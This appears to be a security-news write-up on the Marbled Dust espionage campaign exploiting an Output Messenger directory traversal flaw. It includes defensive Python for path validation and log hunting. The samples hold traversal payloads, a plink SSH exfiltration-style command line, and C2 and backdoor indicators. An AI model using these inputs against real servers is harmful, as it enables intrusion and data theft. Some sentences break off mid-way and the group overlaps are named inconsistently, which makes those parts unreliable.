
Introduction:
A covert cyber-espionage campaign linked to Turkish government interests has come to light, with a hacker group identified as “Marbled Dust” exploiting a zero-day vulnerability in Output Messenger, a multi-platform enterprise chat application. The operation, uncovered by Microsoft Threat Intelligence, has primarily targeted unpatched Output Messenger servers belonging to organizations associated with the Kurdish military in Iraq, signaling an escalation in regional cyber conflict. The attack abuses a directory traversal flaw in Output Messenger that lets an authenticated user write files outside the intended directory; the attackers used it to plant backdoors and exfiltrate data.
Key Points and Breakdown of the Incident:
Microsoft has identified a state-aligned threat group known as Marbled Dust exploiting a previously unknown flaw in Output Messenger.
The vulnerability exploited, CVE-2025-27920, is a directory traversal flaw in the Output Messenger Server Manager application and affects versions prior to 2.0.63.
An authenticated attacker supplies “../” sequences in a file path so that the server writes or reads outside the intended directory; in this campaign that meant planting files in the server’s startup folder.
This campaign began as early as April 2024, roughly eight months before the vulnerability was patched.
Output Messenger’s developer, Srimax, issued a patch (v2.0.63) in December 2024, but exploitation continued on unpatched systems.
Microsoft assesses that the primary targets are associated with the Kurdish military in Iraq, indicating the cyberattack’s geopolitical motive.
Attackers authenticated to Output Messenger’s Server Manager application with stolen credentials, which Microsoft assesses were captured through DNS hijacking or typo-squatted domains.
Once authenticated, the attackers used the traversal flaw to drop OM.vbs and OMServerService.vbs into the server’s startup folder and staged the OMServerService.exe backdoor.
The backdoor communicates with a hardcoded C2 domain (api.wordinfos[.]com) for tasking and data exfiltration.
A second Output Messenger vulnerability, CVE-2025-27921, a reflected cross-site scripting flaw, has also been patched but has not been observed under active exploitation.
The attack chain includes a Golang-based backdoor (OMServerService.exe) capable of executing remote commands and collecting data from the host.
Malware also utilizes
Marbled Dust’s infrastructure links to previous campaigns dating back to 2019, with overlaps with other groups like Sea Turtle and UNC1326.
The group has a history of targeting Middle Eastern and European governmental and telecom institutions.
Past tactics included DNS manipulation to intercept and reuse stolen credentials across different targets.
Microsoft labels this attack as a technological escalation, suggesting Marbled Dust’s evolving skillset.
Their use of a zero-day marks a significant leap in capability and possibly urgency in their objectives.
The vulnerability entry on CVE.org remains incomplete as of May 2025, lacking a severity score (CVSS).
Microsoft reported the flaw to Srimax, which released the fix, but many systems remain vulnerable because the patch has not been applied.
The malware operates on both server and client sides, making it particularly stealthy and effective in persistent threats.
Data exfiltration tactics indicate a focus on gathering intelligence, not financial gain.
Targets’ geographical location and affiliations suggest a strategic interest in military intelligence rather than broad-based attacks.
Exploitation relies heavily on initial credential theft, emphasizing the importance of DNS hygiene and password security.
Backdoor activity is coded in Go, which is increasingly favored by APT groups for its cross-platform utility.
Campaign consistency and infrastructure reuse tie this incident to Marbled Dust’s well-documented modus operandi.
This incident demonstrates the danger of slow patch adoption and poor vulnerability awareness across enterprise systems.
With no enrichment data or CVSS score yet available, it’s harder for cybersecurity teams to prioritize defenses.
The group’s activity continues post-patch, revealing widespread lag in system updates in targeted sectors.
Intelligence gathered could be used for military operations, surveillance, or diplomatic leverage.
The
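The traversal check this incident turns on, shown as an added example rather than Output Messenger’s or Microsoft’s code: a plain path join that a “../” name walks out of, beside a hardened version that decodes the name once, accepts only a bare file name, and confirms the resolved path still sits under the root. The upload root /srv/om/uploads and every file name used here are hypothetical.

```python
"""
Directory-traversal check for a server-side file write: the weak pattern
(plain path join) beside a hardened one. The upload root and the file names
are hypothetical; this is not Output Messenger's code.
"""
import os
from typing import Optional
from urllib.parse import unquote

UPLOAD_ROOT = "/srv/om/uploads"   # hypothetical directory the server intends to write into


def naive_target(user_supplied: str) -> str:
    """Vulnerable pattern: joining the raw name lets '../' walk out of UPLOAD_ROOT.
    normpath() is applied only to show where the write would really land."""
    return os.path.normpath(os.path.join(UPLOAD_ROOT, user_supplied))


def escapes_root(user_supplied: str) -> bool:
    """True when the naive join lands outside UPLOAD_ROOT (the CVE-class behaviour).
    Separator semantics are OS-specific: on POSIX a backslash is an ordinary character,
    on Windows it is a separator, which is one reason safe_target() rejects both."""
    target = naive_target(user_supplied)
    return os.path.commonpath([UPLOAD_ROOT, target]) != UPLOAD_ROOT


def safe_target(user_supplied: str) -> Optional[str]:
    """Hardened: decode once, accept only a bare file name, then re-check the resolved path.
    Returns the path to write, or None when the name must be refused."""
    # Assumption: the name may still be URL-encoded; decode exactly once and validate the result.
    name = unquote(user_supplied)
    if not name or name in (".", "..") or name != name.strip():
        return None
    # No directory components at all: forward slash, backslash, or NUL terminator tricks.
    if any(ch in name for ch in ("/", "\\", "\0")):
        return None
    candidate = os.path.join(UPLOAD_ROOT, name)
    # Belt and braces: resolve both sides (follows symlinks where the tree exists)
    # and require the candidate to share UPLOAD_ROOT as its common prefix.
    root_real = os.path.realpath(UPLOAD_ROOT)
    cand_real = os.path.realpath(candidate)
    if os.path.commonpath([root_real, cand_real]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    for raw in ("report.txt", "../../startup/OM.vbs", "..\\..\\startup\\OM.vbs", "%2e%2e%2fOM.vbs"):
        print(f"{raw!r:32} naive -> {naive_target(raw)!r:40} safe -> {safe_target(raw)!r}")
```

The hardened function refuses the name rather than trying to sanitize it; stripping “../” from input and retrying is what leads to bypasses such as “....//”. The realpath check matters when the upload root can contain symlinks, since a bare-name filter alone does not see where a link points.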
What Undercode Say:
The Marbled Dust campaign reflects a troubling intersection of cyber warfare, geopolitics, and systemic neglect in cybersecurity maintenance. This operation wasn’t a brute-force attack or a random scan of internet-facing apps. It was a precision strike exploiting a zero-day flaw in a widely-used communication tool, targeting a specific ethnic-military group in a volatile region. This aligns with a broader pattern of cyber operations functioning as tools of political influence or suppression, especially in disputed regions like northern Iraq.
What’s especially alarming is that Microsoft discovered and reported the vulnerability, and even after a patch was released, exploitation persisted. This underscores two critical issues: first, the global inconsistency in applying security patches, and second, the underappreciated threat posed by seemingly minor enterprise apps like Output Messenger.
The strategic use of a directory traversal exploit allowed attackers to reach beyond the app’s intended file boundaries and drop a custom Golang-based backdoor with alarming effectiveness. The malware’s connection to a hardcoded C2 domain and the use of plink for file transfer suggest a practised approach to covert data exfiltration. These aren’t script kiddies; they’re operatives running full-fledged cyberespionage operations.
Marbled Dust has gradually evolved from DNS manipulation and infrastructure scanning to full exploitation cycles using custom malware. Their use of typo-squatted domains shows an understanding of human error, while DNS hijacking tactics continue to be effective in credential theft. In this campaign, credentials were the front door, and CVE-2025-27920 was the skeleton key to the vault.
This incident also highlights the risks posed by vulnerable internal communication systems. Organizations often overlook tools like Output Messenger when thinking about critical assets, but this breach proves they can be gateways into much larger systems.
From an operational standpoint, the longevity of the campaign, active from April 2024 until public disclosure in May 2025, demonstrates solid OPSEC on Marbled Dust’s part. Their infrastructure overlap with groups like Sea Turtle and Teal Kurma suggests a possible coalition of state-aligned actors or at least shared resources and tactics.
This report should be a wake-up call for security teams, especially those operating in high-risk geopolitical areas. Even relatively obscure software can become the Achilles’ heel of a well-defended organization. The missing severity score and incomplete CVE documentation exacerbate the risk, as security professionals might deprioritize this vulnerability compared to flashier threats.
In sum, this is cyber warfare dressed in business software. It’s a case study in modern espionage and a reminder that your organization’s weakest link might not be your firewall—it might be your chat client.
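A hunt over log lines for the artifacts the report names (OM.vbs, OMServerService.vbs, OMServerService.exe, the C2 domain api.wordinfos[.]com, and plink), added here as an example and not taken from the page or from Microsoft’s report. The key=value log layout and every log line are constructed samples, and the Windows paths in them are assumptions; the refanging of the defanged domain and the per-line deduplication are the two details worth copying.

```python
"""
Hunt for the Output Messenger campaign artifacts named in the write-up over
constructed log lines. Indicators: OM.vbs, OMServerService.vbs, OMServerService.exe,
C2 domain api.wordinfos[.]com, and plink (reported as the exfiltration tool).
The log lines below are constructed samples, not real telemetry; the key=value
layout and the Windows paths are assumptions.
"""
import re
from typing import Dict, List, Tuple

# Refang the defanged domain exactly as the report prints it.
C2_DOMAIN = "api.wordinfos[.]com".replace("[.]", ".")
C2_ZONE = C2_DOMAIN.split(".", 1)[1]            # "wordinfos.com": also catch sibling subdomains

# File names from the report; lookarounds stop "customOM.vbs" or "OM.vbs2" from matching.
FILE_RE = re.compile(r"(?<![\w.])(om\.vbs|omserverservice\.(?:vbs|exe))(?![\w.])", re.I)
PLINK_RE = re.compile(r"(?<![\w.])plink(?:\.exe)?(?![\w.])", re.I)
QUERY_RE = re.compile(r"\bq=([\w.-]+)")           # assumed DNS-log field: q=<queried name>

# Constructed sample telemetry: DNS queries and process-creation events on one host.
SAMPLE_LINES = [
    "2025-05-01T10:00:01Z host=FS01 q=update.microsoft.com rc=NOERROR",
    "2025-05-01T10:00:07Z host=OMSRV q=api.wordinfos.com rc=NOERROR",
    "2025-05-01T10:00:09Z host=WS07 q=wordinfos.example.com rc=NOERROR",
    '2025-05-01T10:01:30Z host=OMSRV image=C:\\Windows\\System32\\wscript.exe cmd="wscript.exe C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\OM.vbs"',
    '2025-05-01T10:01:31Z host=OMSRV image=C:\\Windows\\System32\\wscript.exe cmd="wscript.exe C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\OMServerService.vbs"',
    '2025-05-01T10:01:35Z host=OMSRV image=C:\\Users\\Public\\Videos\\OMServerService.exe cmd="OMServerService.exe"',
    '2025-05-01T10:05:00Z host=OMSRV image=C:\\Windows\\System32\\svchost.exe cmd="svchost.exe -k netsvcs"',
    '2025-05-01T10:07:12Z host=OMSRV image=C:\\Users\\Public\\plink.exe cmd="plink.exe -ssh -batch ops@203.0.113.10 -pw Pa55"',
]


def scan_line(line: str) -> List[Tuple[str, str]]:
    """Return (severity, indicator) pairs for one line, one entry per distinct indicator."""
    found: List[Tuple[str, str]] = []
    for m in QUERY_RE.finditer(line):
        dom = m.group(1).lower().rstrip(".")
        if dom == C2_ZONE or dom.endswith("." + C2_ZONE):
            found.append(("high", "dns:" + dom))
    # A line such as image=...\OMServerService.exe cmd="OMServerService.exe" names the file
    # twice; collapse to one hit so counts stay meaningful.
    for name in sorted({m.group(1).lower() for m in FILE_RE.finditer(line)}):
        found.append(("high", "file:" + name))
    if PLINK_RE.search(line):
        found.append(("medium", "tool:plink"))    # legitimate tool, so lower severity
    return found


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Scan every line and return hits with their 1-based line number."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        for severity, indicator in scan_line(line):
            hits.append({"line_no": n, "severity": severity, "indicator": indicator, "line": line})
    return hits


def summarize(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count hits per severity."""
    counts: Dict[str, int] = {}
    for h in hits:
        sev = str(h["severity"])
        counts[sev] = counts.get(sev, 0) + 1
    return counts


if __name__ == "__main__":
    results = hunt(SAMPLE_LINES)
    for h in results:
        print(f"line {h['line_no']:>2} [{h['severity']}] {h['indicator']}")
    print(summarize(results))
```

The decoy query for wordinfos.example.com is there to show that the domain check anchors on the zone suffix rather than on a substring, and the svchost line shows that ordinary process events produce no hits. In a real hunt the same three regexes would be pointed at DNS and Sysmon/EDR exports rather than at the list above.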
Fact Checker Results:
Microsoft Threat Intelligence officially reported the campaign and attributed it to Marbled Dust.
The vulnerability CVE-2025-27920 is confirmed, but details remain incomplete in public databases.
Srimax has issued patches, yet exploitation continues due to slow adoption across affected systems.
Prediction:
Given Marbled
References:
Reported By: www.infosecurity-magazine.com